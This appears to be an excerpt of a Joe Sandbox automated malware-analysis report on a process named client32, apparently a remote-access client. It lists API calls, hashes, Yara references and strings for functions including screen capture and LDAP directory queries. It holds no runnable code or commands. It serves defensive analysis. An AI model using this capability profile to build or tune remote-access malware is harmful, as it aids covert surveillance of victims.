Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
Instruction ID: c387f289c61fefa2e5298b52aaefc30f01b1045fb1e2ae40e0bebc4dd9c1f7d1
Opcode Fuzzy Hash: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
Instruction Fuzzy Hash: 96114C7AD40109AFDB518FD4D984EAFFB78EB8626AF010164EC04A7604D730AD4087E2

Function 11132450 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
Instruction ID: 57cc01f50fbb590e2524d85a16b2fbab3df4c7fb8930128a4a94bf816e4774f3
Opcode Fuzzy Hash: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
Instruction Fuzzy Hash: C711E9717142456FEB21DE04D590AEFFBB9EBC533AF20816AE5194790CC231D482C760

Function 110EF160 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110EF18D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
Instruction ID: e567e6d9deb43754708739d5b8ecc67293fcf28fe655b386a3f4b7f61280699d
Opcode Fuzzy Hash: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
Instruction Fuzzy Hash: 22118675A0155D9FDB11CBA9DC94AEEB7EC9F49304F4040DDE9099B240EA70AF488B91

Function 6CC87DF2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6CC84C86,00000000,?,6CC8B17B,00000001,6CC84C86,00000000,00000000,00000000,?,6CC84C86,00000001,00000214), ref: 6CC87E35

Part of subcall function 6CC83E69: __getptd_noexit.LIBCMT ref: 6CC83E69

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 7263e103703ca9270f762aeb24c691cbf3520bc8d8025f05b02ce1bf743f65a9
Instruction ID: 16b7b9d0450d5b0c8b4fd5df47a08f0d703e432df748840fc0b1680256508cf6
Opcode Fuzzy Hash: 7263e103703ca9270f762aeb24c691cbf3520bc8d8025f05b02ce1bf743f65a9
Instruction Fuzzy Hash: 280188353073159EEB149E69D854B5B3B74AB8276CF144669F815C7A90FB34DC00D7B0

Function 1115EAE4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,1102F53F,00000000,?,111587B4,?,1102F53F,00000000,00000000,00000000,?,1115A147,00000001,00000214,?,111028FE), ref: 1115EB27

Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
Instruction ID: 332878df44de031bd3fde79402edd0d066dbf36eb0a5f5ad350df6a08150c577
Opcode Fuzzy Hash: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
Instruction Fuzzy Hash: 59017532B022769AEBD58E25C994B5AF759AB83766F01C629E836C75D0D770D800C760

Function 110596B0 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 110596D5

Part of subcall function 11152939: _xtoa@16.LIBCMT ref: 11152959

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __itow_xtoa@16
String ID:
API String ID: 3813096705-0
Opcode ID: bbef2b48573537a2d43f88530003fca3ed47b688b467b2d15da73ae01ff72678
Instruction ID: 13a37ebd1472f2624f27097917a8cab84d2f8506e0f1e22bbc9518a68e13b01d
Opcode Fuzzy Hash: bbef2b48573537a2d43f88530003fca3ed47b688b467b2d15da73ae01ff72678
Instruction Fuzzy Hash: 13F03A7AA0011DABCB00DE99D981DAFB3BCEB89614F50416AFD0597241DA70AE14C7B1

Function 6CC762C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__vswprintf.LIBCMT ref: 6CC762E6

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: __vswprintf
String ID:
API String ID: 597827344-0
Opcode ID: 92702c1e935f1de81a5d78ec86543eb7b52815c2676f18a1b1af4403285cebd7
Instruction ID: 5ae12fd54b3b6c5a8290007d719fc9a11243d5ab41da5f72ca5b9a3bed8549df
Opcode Fuzzy Hash: 92702c1e935f1de81a5d78ec86543eb7b52815c2676f18a1b1af4403285cebd7
Instruction Fuzzy Hash: F8E065B190111CABCB04EF94CC40DEF73BCEF44208F404199EF09A7641EB30AB1A8BA5

Function 11155CC3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 11155CCE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: 840aff0e7d330be87414fd3cd5a9ac48178d49a546ea7aaee28d5de4cbf962c1
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: F2C02B3300400D7F4F480DE1EC00C043F1DC6803347204211F81CCC090DD32E4108140

Function 111524D7 Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 111524E4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: cdd7364d54deba196aaed2948fa43e78b4163aec9a4e7603f5b1489158abed43
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: F2C0927754020CB7CF911A82EC02E9A7F2A9BC1668F148020FB2C19160AA73EA619689

Function 00831000 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,008310AB,00000000), ref: 00831009

Memory Dump Source

Source File: 00000003.00000002.4452493429.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true

Associated: 00000003.00000002.4452478480.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
Instruction ID: 873c918239665920292636b78528c3728157dd7cccff29de30a6898cc7d99bde
Opcode Fuzzy Hash: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
Instruction Fuzzy Hash: 22B0123210024D67CF057E85ED01C4B3B1DFB40710F004411FD100116286A3D870BAA3

Function 11101990 Relevance: 1.3, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

InitializeCriticalSection.KERNEL32(0000017C,Client,11029690,11026180,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 111019FF

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_malloc_memsetwsprintf
String ID:
API String ID: 1627046820-0
Opcode ID: f405bce1356a212f9c2453a8d151e8ef01d1ff5096b124447abeb105c6babf98
Instruction ID: caaa22ad55ad8e68fabf4963e34a6bd7b0d454a384766d4aec82a24d65ee7ee0
Opcode Fuzzy Hash: f405bce1356a212f9c2453a8d151e8ef01d1ff5096b124447abeb105c6babf98
Instruction Fuzzy Hash: 6C01C8756047059FC724CF29D840BC7BBF5EB89354F10892EE89D87340D775A811CB90

Non-executed Functions

Function 11117290 Relevance: 116.3, APIs: 60, Strings: 6, Instructions: 767windowsleepsynchronizationCOMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 111172AF
GetDC.USER32(00000000), ref: 111172E8
CreateCompatibleDC.GDI32(00000000), ref: 111172F7
CreateCompatibleBitmap.GDI32(00000000,FFFFFFFF,00000001), ref: 1111730C
SelectObject.GDI32(00000000,00000000), ref: 1111731A
GetDeviceCaps.GDI32(00000000,0000000E), ref: 1111732F
GetDeviceCaps.GDI32(?,0000000C), ref: 1111733C
_malloc.LIBCMT ref: 11117363

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

_calloc.LIBCMT ref: 11117374
Sleep.KERNEL32(11117E9D), ref: 111173B8
GetTickCount.KERNEL32 ref: 111173BE
GetSystemMetrics.USER32(0000004C), ref: 11117418
GetSystemMetrics.USER32(0000004D), ref: 11117422
GetTickCount.KERNEL32 ref: 1111749C
WaitForSingleObject.KERNEL32(?,000000FA), ref: 111174D1
_memset.LIBCMT ref: 111174F5
_memset.LIBCMT ref: 11117507
_malloc.LIBCMT ref: 1111762B
_malloc.LIBCMT ref: 11117658
_memset.LIBCMT ref: 11117671
_calloc.LIBCMT ref: 111176D1
_calloc.LIBCMT ref: 111176EF
GetSystemPaletteEntries.GDI32(?,00000000,00000100,?), ref: 1111771A
GetStockObject.GDI32(0000000F), ref: 11117752
SelectPalette.GDI32(?,00000000), ref: 11117760
SelectPalette.GDI32(?,00000000,00000000), ref: 11117770
SelectPalette.GDI32(?,?,00000000), ref: 11117786
RealizePalette.GDI32(?), ref: 11117793
_memset.LIBCMT ref: 111177E5
SelectPalette.GDI32(?,?,00000000), ref: 11117807
DeleteObject.GDI32(?), ref: 1111780E
CreatePalette.GDI32(?), ref: 1111782B
SelectPalette.GDI32(?,00000000,00000000), ref: 11117841
RealizePalette.GDI32(?), ref: 1111784E
BitBlt.GDI32(?,00000000,00000000,FFFFFFFF,00000001,?,?,?,00CC0020), ref: 1111788D
GetObjectA.GDI32(?,00000018,?), ref: 111178A3
GetBitmapBits.GDI32(?,?,?), ref: 111178BE
GetDIBits.GDI32(?,?,00000000,00000001,?,?,00000000), ref: 11117913
_malloc.LIBCMT ref: 11117B49
GetTickCount.KERNEL32 ref: 11117DF6
CloseHandle.KERNEL32(?), ref: 11117E03
_free.LIBCMT ref: 11117E15
_free.LIBCMT ref: 11117E21
_free.LIBCMT ref: 11117E2D
_free.LIBCMT ref: 11117E39
SelectObject.GDI32(?,?), ref: 11117E4F

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

SCRAPE.CPP, xrefs: 111173DE, 11117B62
hStopScrape, xrefs: 111173E3
(, xrefs: 11117692
ScreenScrapeCPU, xrefs: 11117467
Client, xrefs: 1111746C
_, xrefs: 11117492

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$Select$Object$_calloc_free_malloc_memset$CountCreateSystemTick$BitmapBitsCapsCompatibleDeviceMetricsRealize$AllocateCloseDeleteEntriesErrorExitHandleHeapLastMessageProcessSingleSleepStockWaitwsprintf
String ID: ($Client$SCRAPE.CPP$ScreenScrapeCPU$_$hStopScrape
API String ID: 3932011530-2885147004
Opcode ID: 600a8391a81cec4e70f757811e8d3920d250e869274a726aabe3af33894d9a93
Instruction ID: bf10a9902b4c1d1c1bebc66a4f47a1518a6e4e764ac0c29533848247b5017043
Opcode Fuzzy Hash: 600a8391a81cec4e70f757811e8d3920d250e869274a726aabe3af33894d9a93
Instruction Fuzzy Hash: 427239B59002698FDB61DF24CC84B99FBF5BB49304F14C1E9E589AB244DB71AE81CF90

Function 11043450 Relevance: 67.2, APIs: 23, Strings: 15, Instructions: 735libraryloadercomCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(activeds.dll,2F623E72,00000000,?,?), ref: 110434A1
CoInitialize.OLE32(00000000), ref: 110434B9
GetProcAddress.KERNEL32(00000000,ADsOpenObject), ref: 11043506
GetProcAddress.KERNEL32(00000000,ADsGetObject), ref: 1104352E
GetProcAddress.KERNEL32(00000000,ADsEnumerateNext), ref: 11043556
GetTickCount.KERNEL32 ref: 1104357E
GetTickCount.KERNEL32 ref: 110435A1
CoCreateInstance.OLE32(111AC434,00000000,00000001,111AC424,?), ref: 110435E6

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

LDAP://, xrefs: 11043B14
gpfnADsEnumerateNext, xrefs: 1104356B
activeds.dll, xrefs: 11043484
RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11043D34
ADsOpenObject(root) took %d ms, ret %x, xrefs: 110435AC
\, xrefs: 110436A0
LDAP://rootDSE, xrefs: 11043592, 110437CE
CLTCONN.CPP, xrefs: 11043516, 1104353E, 11043566
defaultNamingContext, xrefs: 11043620
ADsOpenObject, xrefs: 11043500
gpfnADsGetObject, xrefs: 11043543
ADsGetObject, xrefs: 11043528
IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11043CD6
gpfnADsOpenObject, xrefs: 1104351B
ADsEnumerateNext, xrefs: 11043550

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$CreateErrorExitInitializeInstanceLastLibraryLoadMessageProcesswsprintf
String ID: ADsEnumerateNext$ADsGetObject$ADsOpenObject$ADsOpenObject(root) took %d ms, ret %x$CLTCONN.CPP$IsMember(%ls, %ls) ret %d, took %u ms$LDAP://$LDAP://rootDSE$RecIsMember(%ls, %ls) ret %d, took %u ms$\$activeds.dll$defaultNamingContext$gpfnADsEnumerateNext$gpfnADsGetObject$gpfnADsOpenObject
API String ID: 1629325221-864219923
Opcode ID: 6cf1abc171d148ef37cb08494be8be29da1bd13e10ddffd78d08bb4dae762b6c
Instruction ID: b21b8b26a9827a219e744ee5b2d38b0866fd03a14aae5df5bfe8785a5e2cba20
Opcode Fuzzy Hash: 6cf1abc171d148ef37cb08494be8be29da1bd13e10ddffd78d08bb4dae762b6c
